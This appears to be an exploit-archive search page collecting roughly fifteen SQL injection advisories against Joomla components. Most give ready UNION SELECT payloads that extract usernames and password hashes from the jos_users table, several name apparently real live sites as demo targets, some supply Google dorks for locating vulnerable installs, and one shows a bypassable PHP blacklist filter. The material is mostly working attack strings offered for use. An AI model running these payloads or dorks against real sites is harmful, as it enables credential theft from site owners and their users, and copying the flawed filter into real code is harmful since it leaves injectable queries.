sql injection joomla
Search result for 'sql injection joomla'
(0.0238749980927 seconds)
Moudi/Joomla Speech SQL Injection ( na)
/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Joomla Component com_speech (id) SQL Injection Vulnerability
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : OFF
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php
*/
[+] Exploit SQL INJECTION:
- Joomla : com_speech .
- Poc:
http://127.0.0.1/index.php?option=com_speech&id=[SQL]
http://www.et.undp.org/index.php?option=com_speech&id=
SQL: null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
The Joomla Speech component suffers from a remote SQL injection vulnerability.
N2n-Hacker/Joomla Route SQL Injection ( na)
# Title:Joomla com_route&kid Sql Injection Vulnerability # Author: N2n-Hacker # Date:2010-03-16 # Script: --[Joomla]-- ######################################################################### ######################################################################### ### ### ### [ Joomla com_route&kid Sql Injection Vulnerability ] ### ### ### ### N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr> ### ### ### ### ### ######################################################################### ######################################################################### # # # # # Searching = ---" option=com_route "--- # # # # # # USING = http://www.site.com/index.php?option=com_route&kid=-35022+ # # UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,# # 13,14,15,16,17,18,19,20,21 FROM JOOMLA USERS--&routing # # # # # # \\\\\\\\\\\\\\\\\\ Activer khfif drif ////////////////// # # # ######################################################################### # My Bad Life But Not For4ver nchallah # #########################################################################
The Joomla Route component suffers from a remote SQL injection vulnerability.
Fl0riX/Joomla Alfresco SQL Injection ( na)
<------------------- header data start ------------------- > ############################################################# # Joomla Component com_alfresco SQL Injection Vulnerability ############################################################# # Author : FL0RiX # Name : com_alfresco # Greez : PyskE,Dr.Kacak And All Friends # Bug Type : SQL Injection # Infection : Admin login bilgileri alinabilir. # Demo Vuln. : http://www.fincaterraqua.com/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.] # Bug Fix Advice : Zararli karakterler filtrelenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users-- < -- bug code end of -- > _________________________________________________________________ Windows Live Hotmail: Arkadaþlarýnýz Facebook'taki güncellemelerinizi doðrudan Hotmail®'den alýr. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009
Joomla Alfresco suffers from a remote SQL injection vulnerability.
Skote Vahshat/Joomla Soft SQL Injection ( na)
#############################################################
[#] Application Name : Joomla (com_soft)
[#] Type : SQL Injection
[#] author : Skte_vahshat
[#] Google Dork : index.php?option=com_soft
[#] E-mail: skote.vahshat@gmail.com
[#] http://www.sthst.com/index.php?option=com_soft&cid=3
#############################################################
< ------------------- header data end of ------------------- >
heloo new bug in joomla
--------------------------------------------------
<?php
$id= $_GET[id];
....
$yasak = array("\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"", "\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\", "/", "*", "", "=", "-
", "#", ";", "<", ">", "+", "%");
$id = str_replace($yasak, "", $id);
$query= "SELECT * FROM users WHERE id= .$id." ;"
...
?>
The Joomla Soft component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla JBounceback SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jbounceback SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_jbounceback SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jbounceback from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jbounceback&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla JBounceback component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla Jiptracker SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jiptracker SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_jiptracker SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jiptracker from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jiptracker&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla Jiptracker component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla JLinks SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jlinks SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_jlinks SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_jlinks&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla JLinks component suffers from a remote SQL injection vulnerability.
L0rd CrusAd3r/Joomla RSGallery SQL Injection ( na)
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_rsgallery SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue®, S1ayer,d3c0d3r,KD and to all ICW members
###############################################################################################################################################################################################
Joomla com_rsgallery SQL Injection Vulnerability
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
#####################################################################################################################################################################################################
Description:
Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://demo.ijoobi.com/index.php?option=com_rsgallery2&Itemid=[sqli]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# 0day n0 m0re #
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##########################################################################################################################################################################################
The Joomla RSGallery component suffers from a remote SQL injection vulnerability.
bhunt3r/Joomla Mochigames SQL Injection ( na)
[~]>> ...[BEGIN ADVISORY]... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> TITLE: Joomla (com_mochigames) SQL Injection Vulnerability [~]>> LANGUAGE: PHP [~]>> DORK: N/A [~]>> RESEARCHER: B-HUNT3|2 [~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com [~]>> TESTED ON: LocalHost !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> DESCRIPTION: Input var id is vulnerable to SQL Code Injection [~]>> AFFECTED VERSIONS: Confirmed in 0.51 but probably other versions also [~]>> RISK: Medium/High [~]>> IMPACT: Execute Arbitrary SQL queries !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> PROOF OF CONCEPT: [~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=[SQL]&option=com_mochigames&Itemid=80 [~]>> http://[HOST]/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> ...[END ADVISORY]...
The Joomla Mochigames component suffers from a remote SQL injection vulnerability.
bhunt3r/Joomla JBPublishdownfp SQL Injection ( na)
[~]>> ...[BEGIN ADVISORY]... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> TITLE: Joomla (com_jbpublishdownfp) SQL Injection Vulnerability [~]>> LANGUAGE: PHP [~]>> DORK: N/A [~]>> RESEARCHER: B-HUNT3|2 [~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com [~]>> TESTED ON: LocalHost [~]>> PRE-REQUERIMENTS: Privileged user !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> DESCRIPTION: Input var cid[] is vulnerable to SQL Code Injection [~]>> AFFECTED VERSIONS: Confirmed in 1.4 but probably other versions also [~]>> RISK: Low/Medium [~]>> IMPACT: Execute Arbitrary SQL queries !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> PROOFS OF CONCEPT: [~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=[SQL] [~]>> http://[HOST]/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> ...[END ADVISORY]...
The Joomla JBPublishdownfp component suffers from a remote SQL injection vulnerability.
NeX HaCkeR/Joomla Question SQL Injection ( na)
################################################### # |Title : Joomla (com_question) SQL Injection Vulnerability # |Vendor : http://www.alex-ensdorf.de/ # |Version : Joomla 1.5 # |Date : 15/5/2011 # |Author : NeX HaCkEr # |Contact : Error_log@hotmail.com ################################################## # | Exploit : # | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL] # | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all # | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 ################################################## # | Demo: # | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 ################################################## # | Greetz : # | Dr.KAsBeR & DaShEr & MaFiA & WeeD ##################################################
The Joomla Question component suffers from a remote SQL injection vulnerability.
SOLVER/Joomla Foto SQL Injection ( na)
<------------------- header data start ------------------- > ############################################################# Joomla Component Com_foto SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 18.06.2011 # Name : Joomla com_foto # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Example Vuln : [+]/index.php?option=com_foto&task=categoria&id_categoria=[EXPLOIT] [+] Dork:inurl:"com_foto" [+] Demo: http://site/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users-- # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. #############################################################
The Joomla Foto component suffers from a remote SQL injection vulnerability.
SOLVER/Joomla Controller SQL Injection ( na)
<------------------- header data start ------------------- > ############################################################# Joomla Component Com_Controller SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 13.06.2011 # Name : Joomla com_controller # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Example Vuln : [+]/index.php?option=com_controller&id=53&Itemid=[EXPLOIT] [+] Dork:inurl:"com_controller" [+] Demo: http://site/index.php?option=com_controller&id=53&Itemid=-16+union+select+1,2,3,4,5,6,7,8,9-- # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. #############################################################
The Joomla Controller component suffers from a remote SQL injection vulnerability.
SOLVER/Joomla Joomnik SQL Injection ( na)
<------------------- header data start ------------------- > ############################################################# Joomla Component Joomnik Gallery SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 26.05.2011 # Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line # Name : Joomla com_joomnik # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Example Vuln : [+]/index.php?option=com_joomnik&album=[EXPLOIT] [+] Dork:"com_joomnik" [+] Demo: http://site.com/index.php?option=com_joomnik&album=6' # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. ############################################################# http://joomlacode.org/gf/project/joomnik/
The Joomla Joomnik component suffers from a remote SQL injection vulnerability.
Fl0riX/Joomla Client SQL Injection ( na)
<------------------- header data start ------------------- > ############################################################# Joomla Component client SQL Injection Vulnerability ############################################################# # Author : Fl0riX ~ Bug Researchers # Name : Joomla com_client # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Demo Vuln : [+]/index.php?option=com_client&task=category&prf=fl0&catid=1[EXPLOIT] [+] Dork: inurl:"index.php?option=com_client" # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : +and+1=2+union+select+1,concat(username,0x3a,email)fl0rix,3,4,5,6+from+jos_users-- < -- bug code end of -- >
The Joomla Client component suffers from a remote SQL injection vulnerability.